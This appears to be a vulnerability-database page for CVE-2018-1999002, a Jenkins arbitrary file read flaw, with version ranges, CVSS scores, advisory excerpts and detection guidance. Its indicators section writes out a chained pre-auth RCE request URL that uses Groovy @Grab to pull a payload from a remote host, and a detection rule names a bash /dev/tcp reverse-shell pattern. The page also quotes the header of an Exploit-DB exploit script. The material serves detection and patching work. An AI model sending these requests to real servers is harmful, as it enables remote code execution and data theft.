CVE-2018-1999002
published 2018-07-23CVE-2018-1999002: A arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework's org/kohsuke/stapler/Stapler.java…
PriorityP275high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
86.64%
99.7th percentile
A arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework's org/kohsuke/stapler/Stapler.java that allows attackers to send crafted HTTP requests returning the contents of any file on the Jenkins master file system that the Jenkins master has access to.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jenkins | files_indicating_when_a_plugin | — | — |
| jenkins | jenkins | <= 2.121.1 | — |
| jenkins | jenkins | 2.122 – 2.132 | — |
| jenkins | jenkins_core | — | — |
| jenkins | jenkins_lts | — | — |
| jenkins | jenkins_weekly | — | — |
| oracle | communications_cloud_native_core_automated_test_suite | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27{:s}%27,%20root=%27http://{:s}%27)%0a@Grab(group=%27package%27,%20module=%27{:s}%27,%20version=%271%27)%0aimport%20Payload;↗
path/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile↗
path/securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
path/securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
- →Detect unauthenticated or authenticated HTTP GET requests to the Jenkins Stapler framework containing path traversal patterns targeting arbitrary files on the Jenkins master filesystem. ↗
- →Alert on HTTP GET requests to /securityRealm/user/*/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile containing @GrabConfig, @GrabResolver, and @Grab annotations in the value parameter — this is the chained CVE-2019-1003000 + CVE-2018-1999002 pre-auth RCE trigger. ↗
- →Alert on HTTP GET requests to /securityRealm/user/*/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript with sandbox=true and a value parameter containing .execute() — indicative of sandbox bypass exploitation.
- →Monitor Jenkins master process for outbound DNS or HTTP connections to unexpected external hosts immediately following requests to the checkScriptCompile or checkScript endpoints — indicates successful SSRF/RCE via Groovy @Grab. ↗
- →Detect creation of META-INF/services/org.codehaus.groovy.plugins.Runners on disk, which is a key artifact of the exploit's malicious JAR payload staging. ↗
- →Monitor for Jenkins processes spawning /bin/bash -c with a reverse shell payload (bash -i >& /dev/tcp/...) as a child process, indicating successful RCE. ↗
- ·The exploit targets a specific combination of vulnerable plugin versions. Confirm the environment has Script Security <=1.49, Pipeline: Declarative <=1.3.4, and Pipeline: Groovy <=2.61 before treating detections as confirmed exploitation. ↗
- ·CVE-2018-1999002 (arbitrary file read) affects Jenkins <=2.132 and <=2.121.1 LTS. Red Hat OpenShift Enterprise 3 was assessed as Not Affected — tune detections accordingly for containerized/OCP deployments. ↗
- ·The chained pre-auth RCE requires CVE-2018-1999002 (file read) combined with CVE-2019-1003000 (sandbox bypass). Detections for the file-read path alone may not indicate full RCE; look for the combination of both endpoint accesses. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Improper Input Validation in Jenkins
ghsa·2022-05-13
CVE-2018-1999002 [HIGH] CWE-20 Improper Input Validation in Jenkins
Improper Input Validation in Jenkins
A arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework's org/kohsuke/stapler/Stapler.java that allows attackers to send crafted HTTP requests returning the contents of any file on the Jenkins master file system that the Jenkins master has access to.
OSV
Improper Input Validation in Jenkins
osv·2022-05-13
CVE-2018-1999002 [HIGH] Improper Input Validation in Jenkins
Improper Input Validation in Jenkins
A arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework's org/kohsuke/stapler/Stapler.java that allows attackers to send crafted HTTP requests returning the contents of any file on the Jenkins master file system that the Jenkins master has access to.
Red Hat
jenkins: Flaw in the Stapler web framework allows remote unauthenticated users to read arbitrary files
vendor_redhat·2018-07-18·CVSS 7.5
CVE-2018-1999002 [HIGH] CWE-20 jenkins: Flaw in the Stapler web framework allows remote unauthenticated users to read arbitrary files
jenkins: Flaw in the Stapler web framework allows remote unauthenticated users to read arbitrary files
A arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework's org/kohsuke/stapler/Stapler.java that allows attackers to send crafted HTTP requests returning the contents of any file on the Jenkins master file system that the Jenkins master has access to.
Package: jenkins (Red Hat OpenShift Enterprise 3) - Not affected
Jenkins
Jenkins Security Advisory 2018-07-18
vendor_jenkins·2018-07-18·CVSS 8.8
CVE-2018-1999001 [HIGH] Jenkins Security Advisory 2018-07-18
Title: Jenkins Security Advisory 2018-07-18
Jenkins Security Advisory 2018-07-18
Jenkins Security Home
For Administrators
Overview
Terminology
Vulnerabilities and Scoring
Security Advisories
Security Issues
Advisory Schedule
Vulnerabilities in Plugins
How We Fix Security Issues
For Reporters
Reporting Vulnerabilities
Jenkins CNA
For Maintainers
Overview
Vulnerabilities in Plugins
Jenkins Security Team
About
Contributions
This advisory announces vulnerabilities in the following Jenkins deliverables:
Jenkins (core)
Descriptions
Users without Overall/Read permission can have Jenkins reset parts of global configuration on the next restart
SECURITY-897
/
CVE-2018-1999001
Severity (CVS
No detection rules found.
Exploit-DB
Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution
exploitdb·2019-02-25·CVSS 7.5
CVE-2019-1003000 [HIGH] Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution
Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution
---
#!/usr/bin/env python
#
# Exploit Title : jenkins-preauth-rce-exploit.py
# Date : 02/23/2019
# Authors : wetw0rk & 0xtavian
# Vendor Homepage : https://jenkins.oi
# Software Link : https://jenkins.io/download/
# Tested on : jenkins=v2.73 Plugins: Script Security=v1.49, Pipeline: Declarative=v1.3.4, Pipeline: Groovy=v2.60,
#
# Greetz: Hima, Fr13ndzSec, AbeSnowman, Berserk, Neil
#
# Description : This exploit chains CVE-2019-1003000 and CVE-2018-1999002 for Pre-Auth Remote Code Execution in Jenkins
# Security Advisory : https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
#
# Vulnerable Plugins -
# Pipeline: Declarative Plugin up to and including 1.3.4
# Pipeline: Groovy Plugin up to and
Nuclei
Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
nuclei·CVSS 7.5
CVE-2019-1003000 [HIGH] Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
Template:
id: CVE-2019-1003000
info:
name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
author: sttlr
severity: high
description: |
A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attacke
https://jenkins.io/security/advisory/2018-07-18/#SECURITY-914https://www.exploit-db.com/exploits/46453/https://www.oracle.com/security-alerts/cpuapr2022.htmlhttps://jenkins.io/security/advisory/2018-07-18/#SECURITY-914https://www.exploit-db.com/exploits/46453/https://www.oracle.com/security-alerts/cpuapr2022.html
2018-07-23
Published